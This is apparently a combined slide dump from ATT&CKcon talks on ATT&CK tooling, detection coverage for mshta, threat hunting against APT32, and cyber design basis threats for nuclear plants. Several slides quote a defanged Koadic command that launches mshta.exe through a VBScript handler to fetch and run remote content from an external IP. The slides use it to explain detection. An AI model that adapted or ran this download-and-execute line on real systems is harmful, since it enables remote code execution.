13. MY
WISHLIST
● Load DB with ATT&CK content
● Use TRAM to load new relationships
● Manually add adversary mappings
● Create more relationships (industries,
dates, adversary types…)
● Explore relationships through GUI
● Edit selected data through GUI
● Edit relationships through GUI
● Export data to ATT&CK Navigator
● Dockerize everything for easy deployment
18. SO FAR…
● Load DB with ATT&CK content
● Use TRAM to load new relationships
● Manually add adversary mappings
● Create more relationships (industries,
dates, adversary types…)
● Explore relationships through GUI
● Edit selected data through GUI
● Edit relationships through GUI
● Export data to ATT&CK Navigator
● Dockerize everything for easy deployment
34. GOALS
● Create more relationships (dates,
adversary types…)
● Manually load new mapping
● Edit relationships through UI
● Dockerize everything for easy
deployment
● Add relational graphs to study the
adversaries
36. CREDITS: This presentation template was
created by Slidesgo, including icons by
Flaticon, and infographics& images by
Freepik.
THANKS!
Please keep this slide for attribution.
Do you have any questions?
@fierytermite
linkedin.com/in/valentinapalacin
Credits: This presentation template was created by Slidesg, including
icons by Flaticon and infographics & images by Freepik.
37. From Theory to Practice:
How My ATT&CKⓇ
Perspectives Have Changed
Katie Nickels
ATT&CKcon Power Hour
December 11, 2020
38. Yes, this is being
recorded. Yes, the slides
will be shared. No, I don’t
know when. Soon.
39. § Former MITRE ATT&CK Team Member (relevant)
§ SANS Certified Instructor for FOR578:
Cyber Threat Intelligence
§ Bringing context about threats to inform decisions
§ Maintaining sanity with exercise, chocolate,
containers, and holiday lightsKatie Nickels
DIRECTOR OF INTELLIGENCE
RED CANARY
@LiketheCoins
About Me
41. 1. Tracking tactics, techniques, and procedures
2. Defining detection coverage
3. Choosing what to detect
How I've thought differently about ATT&CK
43. Tracking TTPs the MITRE way
https://attack.mitre.org/techniques/T1218/005/
Tactic: Defense Evasion
Technique/Sub-technique: Signed Binary Proxy Execution: Mshta
Procedure: Koadic can use MSHTA to serve additional payloads.[13]
46. Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Koadic used VBScript to launch mshta.exe and make an
external network connection
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").
run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
Example of tracking beyond TTPs
47. Primary Tactic: Execution
Additional Tactics
Techniques
Procedure ★
Observable
Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").run("mshta
hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors
Name Targeted to this profile?
WIN-MSHTA-CLI-URL No
WIN-MSHTA-NON-HTA No
WIN-MSHTA-INLINE-VBSCRIPT No
TA0005 Defense Evasion
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
48. What this format lets us do
§ Track detailed observables from endpoint telemetry
§ Identify where we have detection coverage (or not)
§ Use ATT&CK tactics, techniques, and sub-techniques
...but add on because it meets our needs
50. Defining coverage by confidence
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
51. The challenge of unlimited procedures
“You should also remember that each ATT&CK technique may
have many procedures for how an adversary could implement
it — and because adversaries are always changing, we can’t
know what all those procedures are in advance.”
https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
52. Katie: “There are unlimited procedures!”
§ Matt: “But are there?”
o Think of techniques like MSHTA
o Commands only have so many flags
§ We may be able to be scope some technique variations
55. Nine known variations for HTA
1. HTA can have any file name and extension
2. Specifying a URI from where HTA content is first downloaded
3. Use of scripting engines
4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”)
5. HTA content embedded and executed from within other file formats
6. HTA content can be executed remotely via UNC paths.
7. Remote HTA execution via COM interface (lateral movement)
8. HTA execution by double clicking or invoking with “explorer.exe foo.hta”
9. Full control over the path and filename of mshta.exe and rundll32.exe
https://redcanary.com/blog/threat-research-questions
56. Adding in variations
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Specifying protocol handler + direct download from URI
Koadic used VBScript to launch mshta.exe and make an
external network connection
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").
run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
57. Mix and match the variations
Specifying
protocol handler
vbscript:
Direct download from URI
mshta hxxp[:]//8.8.8[.]8:123/
Specifying
protocol handler
jscript:
https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
58. Testing known variation combinations
T1218.005
Signed Binary Proxy
Execution:
Mshta
25 tested combinations 1 technique
More granular Less granular
60. Remember that profile breakdown?
Techniques
Observable
Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").run("mshta
hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors
Name Targeted to this profile?
WIN-MSHTA-CLI-URL No
WIN-MSHTA-NON-HTA No
WIN-MSHTA-INLINE-VBSCRIPT No
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
61. Mapping coverage based on threats
Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Kovter observable 1
Lazarus observable 1
6 threat observables for Mshta 1 technique
More granular Less granular
T1218.005
Signed Binary Proxy
Execution:
Mshta
64. Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Lazarus observable 1
Diving deeper
These are okay too!
HTA test harness results Mshta threat observables
65. Expressing coverage is just tough
§ Any way you express it will have limitations
§ There’s no “right” or “wrong” way to do it
...but there may be “better” ways for your needs
§ Figure out the requirement for what you’re doing
o What are you trying to convey and achieve?
o What’s your goal of expressing the coverage?
67. § Not everything is useful for detection
§ Choosing is most of the battle
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
Finding “good” detection opportunities
68. § “Discovery techniques aren’t that useful for detection”
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
Discovery techniques
70. § “This should NEVER happen in an environment, let’s write a
detection analytic!” —Me in January 2020
§ “Here’s a hypothesis that will probably be noisy so here are five
ways to tune it when that happens.” —Me in December 2020
§ If an analytic is noisy…how can we tune it?
o Narrow it down? Use threat intelligence.
o Easily suppress on false positives?
Testing & tuning is most of the work
https://redcanary.com/blog/tuning-detectors/
72. Takeaways
§ Don’t limit yourself to just TTPs if you need to go further
§ Define detection coverage based on your requirements
§ Trial, error, and experience will help you choose what to detect
§ It’s a good thing to change your perspectives
§ Surrounding yourself with new people and new situations lets
you think differently and mature
74. Sharpening your Threat Hunting
Program with ATT&CK Framework
HieuTran
Detection Team Lead | FPT Cybersecurity Division
75. INDEX
Sharpening your Threat Hunting Program with ATT&CK framework
01 Threat Hunting vs Threat Detection
03 MITRE ATT&CK - Threat
Hunter Common Language
02Threat Hunting Methodology
04Case study
05 Key takeaways
06Q&A
76. Human-driven (and assisted
by tools) practice of
searching iteratively
through data to detect
advanced threats that evade
traditional security controls
77. Threat Hunting vs
Threat Detection
Threat Hunting Threat Detection
DEFINITION
• Proactive
• Humans find bad stuffs with the
help of machines
PROs
• Identifying detection gaps and
creation of new detections
CONs
• Need security expert for
searching, hunting…etc
• Slow and expensive
DEFINITION
• Reactive
• Automated with machines such as
SIEM, IDS/IPS, AV, etc
PROs
• Least expensive approach
CONs
• Likely to miss something (False
Negatives)
• Spend too much time because of
alert fatigues (False Positives)
79. NUMBERS TELL STORIES:
GLOBAL DWELL TIME
It takes so long to detect
bad guys inside your
organization.
FireEye Mandiant M-Trends 2020 Special Report
80. Threat Hunting Methodology
1.Target: Scope the data sets that will be used in your
investigation. Hunts can branch from various starting points.
2.Hunt: Proactively and iteratively search through network
and endpoint data to detect and isolate advanced threats
that evade more traditional security solutions.
3.Disrupt: Seamlessly pivot from hunting to forensic analysis,
in order to disrupt adversaries before they fully execute their
attacks. These analyses can also generate new indicators that
can be fed into complementary security systems, creating a
valuable security feedback loop.
83. Case Study: APT32
Threat Hunting and Incident Response against Cyber Espionage
Threat Actors: APT32 – OceanLotus/SeaLotus/CobaltKitty
Our customer current situation:
• Large enterprise with huge numbers of endpoints: ~1000 Servers,
6000 Workstations.
• Core services (Active Directory, Email Server, Antivirus
Management) already compromised.
• Operations and security staff machines were compromised.
IT IS A CHAOS
85. Based on what we found on compromised servers/workstations, we built our
hypothesis:
• Gain Initial Access by using Spear Phishing to gather Valid (administrator)
Accounts.
• Execution malicious payload with Living-off-the-land Binary (LOLBIN)
techniques.
• Stay Persistence by installing New Service or Registry Run Keys.
• Stay under the radar (Defense Evasion) by Software Packing, DLL Hijacking, File
Deletion….
• Discovery by Network Service Scanning and Bruteforcing using custom
malware/scripts.
• C2 Communication using Commonly Used Port (80, 443, 53)
Case Study: APT32
88. Case Study #1
We deployed independent hunting stacks:
• Endpoint Detection & Response
• Datalake (Gathering all essentials service logs, including: DNS, Proxy, AD…)
• Advanced Threat Detection
• Network Detection & Response
Automate lots of work by leveraging OpenAPI:
• Quickly deploy data acquisitions script across enterprise infrastructure.
• Preventing active C2 connection with Endpoint Isolation and Binary Isolation.
• Speeding up cleaning malware artifacts (remove binary files, executable files
and registry run keys).
89. Case Study #1
At the end of the days, we discovered:
• 13 C2 domains and 12 C2 IPs:
• 04 C2 domains have never seen before.
• 26 servers and 96 clients were compromised.
• 09 UserSIDs were used to install malicious service.
• Multiple malware artifacts, could be divine into 03 groups:
• Binary files (.exe and .dll files)
• Script (Powershell, C#, JScript, .NET)
• Webshell (PHP Script)
• C2 Payload (found in Registry)
90.
91. We will be able to hunting at scale with:
Right staff with right skillsets
Right process/procedures for hunting
Right technical solutions that enable hunters
92. Key Takeaways
1. Assume-breach mindset.
2. Training your staffs with threat hunter skillsets (or
outsource).
3. Building roadmap for implementing solution properly.
95. PREVIOUS ICS EXPERIENCE
+ Idaho National Laboratory
+ Areva NP
+ Duke Energy
ABOUT THE PRESENTER
JACOB BENJAMIN – DIRECTOR OF PROFESSIONAL SERVICES
RESEARCH AREAS
+ Nuclear Cybersecurity
+ Cyber Risk Management
+ Wireless Security
+ Software-Defined Networking
+ Malware Analysis
+ Steganography Detection
CREDENTIALS
+ Ph.D., Computer Science
+ M.S., Cybersecurity
+ B.S., Computer Science
+ CISSP
96. + What is a DBT?
+ How are they
developed?
+ What does a DBT look
like?
+ Are there cyber DBTs?
DESIGN BASIS THREAT (DBT)
OVERVIEW
97. “ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF
NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF
6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE,
AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY
WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE
INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE
KNOWLEDGE OF THE FACILITY AND ASSOCIATED
PHYSICAL PROTECTION MEASURES. WILLING TO DIE
OR TO KILL. NO COLLUSION WITH INSIDER.”
IAEA DBT WORKSHOP
EXAMPLE DBT
98. S E N S I N G O P P O R T U N I T I E S
RESPONSE TIME VS ADVERSARY TASK TIME
Adversary Task Time
Adversary Task Time Remaining After 1st Sensing
PPS Response Time
T0 TD Ti Tc
Detection
Time
Response
Force Time
Time
Remaining
After
Interruption
Adversary
Detected
Adversary
Interrupted
Time
First
Sensing
Adversary
Begins Task
Adversary
Completes
Task
99. Z
Z
Z
CYBER SECURITY
FOR NUCLEAR POWER PLANTS
KEY DOCUMENTS
• NEI 04-04, Voluntary Cyber Program
• 10 CFR 73.54, The Cyber Rule
• NEI 08-09, Cyber Security Plan
• NEI 13-10, Cyber Security Assessments
CHALLENGES
• Describing the cyber threat landscape
• Modeling cyber-initiated events
• Mal-operation vs malware
USING ATT&CK
• Describe threat behavior
• Conduct adversary emulation
• Evaluate actual events & case studies
Cybersecurity risk mitigation for
nuclear power plants began in
2002 and 2003, when the NRC
included cybersecurity
requirements in the Physical
Security and Design Basis Threat
Orders.
100. Z
Z
Z
USING TRADITIONAL DBT
ANALYSIS FOR CYBER
PAST CYBER EVENTS
Nuclear sector
Energy sector
ICS overall
CREDIBLE THREAT INTELLIGENCE
Dragos World View Bulletins
CISA / ICS-CERT
Vendors
SITE SPECIFIC TARGETS
Crown Jewel Analysis
Consequence-based targeting
101. EXAMPLE CYBER DBT DEVELOPMENT
• SIS
• Turbines
• Generators
Targets
• CrashOverride
• Trisis
• Stuxnet
Past
Events
• World View
• CISA
• Vendors
Threat
Intel
102. ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT.
ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY
COMPROMISE, EXTERNAL REMOTE SERVICES, VALID
ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS-
TAILORED MALWARE. THEY HAVE DESTRUCTIVE
CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS,
AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL
CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL
HARM OR KILL. NO COLLUSION WITH INSIDER.
CYBER DBT
RESULT
106. • DIGEST THREAT INTELLIGENCE
• WorldView, CISA, vendors, etc.
• UNDERSTAND YOUR SYSTEMS
• Crown Jewel Analysis
• EVALUATE YOUR DEFENSES
• Quantify your mitigation and detection coverage
• FOCUS ON THREAT BEHAVIORS
• Combine and correlate this information with a common lexicon (ATT&CK)
HOW TO CREATE A CYBER DBT
SUMMARY
107. • ASSESS EFFECTIVENESS OF DEFENSES
• EVALUATE THREAT DETECTION COVERAGE
• DEVELOP AND TEST IR PLAYBOOKS
• TRAIN PERSONNEL
• IDENTIFY ‘BEYOND DESIGN’ SCENARIOS
WHY SHOULD YOU USE CYBER DBTS?
SUMMARY